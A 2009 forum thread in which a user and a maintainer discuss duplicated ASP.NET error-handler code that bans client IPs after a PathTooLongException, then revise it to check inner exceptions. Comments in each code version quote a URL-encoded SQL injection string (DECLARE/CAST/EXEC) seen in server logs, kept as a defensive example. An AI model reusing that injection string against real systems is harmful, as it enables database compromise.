Code BannedIPAddress

6/24/2009 2:26:48 AM

Code BannedIPAddress

OS: win 2003
DB: Sqlite
Version:2.3.0.8

Hi, Joe

Code in Global.asax

/////////////////////////////////////////////////////////////////////////////

// Fragment of the application-wide error handler in Global.asax as quoted in the post;
// the dotted lines mark code the poster left out. The visible part writes a ban record
// for the address of the current request.
protected void Application_Error(Object sender, EventArgs e)
{
.................................

try
{
BannedIPAddress b = new BannedIPAddress();
// NOTE(review): UserHostAddress is the address of the directly connected peer. Behind a
// reverse proxy, load balancer or shared NAT that one address can stand for many users,
// so an automatic ban may block more than the offending client — confirm the deployment.
b.BannedIP = HttpContext.Current.Request.UserHostAddress;
// Fixed reason label; the condition that leads to this ban is in the elided part above.
b.BannedReason = "PathTooLongException";
// Timestamp is taken in UTC.
b.BannedUtc = DateTime.UtcNow;
b.Save();
}

................................

}

is almost the same as the code in BannedIPBlockingHttpModule.cs:

// Error handler of the HTTP module as quoted in the post (dotted lines are elided code).
// It reads the last server error and, when that error is a PathTooLongException, clears
// the error, adds the client to the ban list and aborts the request.
private void Error(object sender, EventArgs e)
{
......
// don't throw an error in our error handler
try
{
HttpApplication app = (HttpApplication)sender;
HttpContext context = app.Context;


Exception rawException = context.Server.GetLastError();
if (rawException != null)
{
// Only the outermost exception is tested here; a PathTooLongException carried as
// InnerException of a wrapper exception does not match this condition.
if (rawException is PathTooLongException)
{
// hacking attempts
/* example seen in logs
* /download.aspx?skin=printerfriendly;DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(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%20AS%20CHAR(4000));ExEC(@S);
*/
// The branch keys on the exception type, not on the request content shown above.
app.Context.Server.ClearError();

/* Blacklist em */
// NOTE(review): a single matching error is enough to ban. AddIPToBanList is not shown;
// presumably it stores the request's client address — confirm which address it uses
// when the site sits behind a proxy or shared NAT.
AddIPToBanList(context, "PathTooLongException");
AbortRequestFromBannedIP(context);
return;

}

}

..............

}

/////////////////////////////////////////////////////////////////

Why is the same code in two places?

Thanks!

 

6/24/2009 6:40:57 AM

Re: Code BannedIPAddress

You are right, I am removing the duplicate from global.asax.cs

Best,

Joe 

6/26/2009 10:46:22 AM

Re: Code BannedIPAddress

Server OS:Win2003
Client OS:Win2003
DB:Sqlite
Version:2.3.0.9

Hi, Joe
The code below in BannedIPBlockingHttpModule.cs should be changed to match Global.asax in version 2.3.0.8:

//////////////////////////////////////////////////////////////////////////////////
// Module error handler as it stands in version 2.3.0.9, quoted with elisions (dotted lines).
// It bans and aborts only when the last server error itself is a PathTooLongException.
private void Error(object sender, EventArgs e)
{
.......................
Exception rawException = context.Server.GetLastError();
if (rawException != null)
{
// Single type test on the outermost exception: if the PathTooLongException is wrapped
// (present only as InnerException), this branch is skipped and no ban is recorded.
if (rawException is PathTooLongException)
{
// hacking attempts
/* example seen in logs
* /download.aspx?skin=printerfriendly;DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(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%20AS%20CHAR(4000));ExEC(@S);
*/
app.Context.Server.ClearError();

/* Blacklist em */
AddIPToBanList(context, "PathTooLongException");
AbortRequestFromBannedIP(context);
return;

}
}
................................................
}

It should be changed as shown below, or as in Global.asax in version 2.3.0.8:

// Proposed replacement for the module error handler, quoted with elisions (dotted lines).
// Instead of testing only the last server error, it walks the InnerException chain and
// bans/aborts as soon as any exception in the chain is a PathTooLongException.
private void Error(object sender, EventArgs e)
{
..........................................
Exception rawException = context.Server.GetLastError();
// The loop ends either by the return in the matching branch or when the chain runs out
// (InnerException is null); every non-matching pass moves one level deeper.
while (rawException != null) //changed
{
if (rawException is PathTooLongException)
{
// hacking attempts
/* example seen in logs
* /download.aspx?skin=printerfriendly;DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(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%20AS%20CHAR(4000));ExEC(@S);
*/
app.Context.Server.ClearError();

/* Blacklist em */
// NOTE(review): with the chain walk, a PathTooLongException at any nesting depth now
// triggers a ban; AddIPToBanList is not shown — confirm which client address it records.
AddIPToBanList(context, "PathTooLongException");
AbortRequestFromBannedIP(context);
return;

}
else
{
// Not a match at this level: continue with the wrapped exception, if any.
rawException = rawException.InnerException;  //Added
}

}
......
}
////////////////////////////////////////////////////////////////////////////////

The code in Global.asax in version 2.3.0.8 is right: rawException's type is not PathTooLongException, but rawException.InnerException's type is PathTooLongException.

Thanks!

6/26/2009 11:11:36 AM

Re: Code BannedIPAddress

Hi,

I changed it like this:

// Revised check from the maintainer: ban and abort when the last server error, or its
// direct InnerException, is a PathTooLongException.
Exception rawException = context.Server.GetLastError();
if (rawException != null)
{
// Exactly two levels are inspected (the exception and its immediate InnerException);
// a PathTooLongException nested deeper in the chain would not match.
// `is` already evaluates to false for a null reference, so the explicit InnerException
// null test is redundant but harmless.
if (
(rawException is PathTooLongException)
|| ((rawException.InnerException != null) && (rawException.InnerException is PathTooLongException))
)
{
// hacking attempts
/* example seen in logs
* /download.aspx?skin=printerfriendly;DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(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%20AS%20CHAR(4000));ExEC(@S);
*/
// Clear the error first so the request is not processed further as a failure.
app.Context.Server.ClearError();

/* Blacklist em */
// NOTE(review): the ban is keyed on the exception type and fires on a single request.
// AddIPToBanList is not shown; if it uses the connecting peer's address, a shared proxy
// or NAT address could be banned for all of its users — confirm against the helper.
AddIPToBanList(context, "PathTooLongException");
AbortRequestFromBannedIP(context);
return;

}


}

Best,

Joe 
